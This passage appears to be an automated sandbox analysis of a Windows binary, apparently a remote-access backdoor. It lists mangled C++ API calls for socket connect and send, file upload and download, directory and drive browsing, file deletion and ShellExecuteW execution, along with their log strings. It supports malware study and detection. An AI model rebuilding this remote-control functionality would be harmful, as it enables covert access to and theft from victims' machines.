                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6B015DF8,?,?,?,?,?,00000055), ref: 004046AC
                                  • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                    • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                    • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                    • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                  • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                  • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                  • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                  • API String ID: 1698304352-2559757301
                                  • Opcode ID: 95656dfe8ae8ede5788f7ba96900a99ba4c8720e40a65be906c165ee56cac39b
                                  • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                  • Opcode Fuzzy Hash: 95656dfe8ae8ede5788f7ba96900a99ba4c8720e40a65be906c165ee56cac39b
                                  • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00404783
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                  • wcscmp.MSVCRT ref: 00404924
                                  • wcscmp.MSVCRT ref: 0040493C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                    • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                    • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                    • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                    • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                    • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
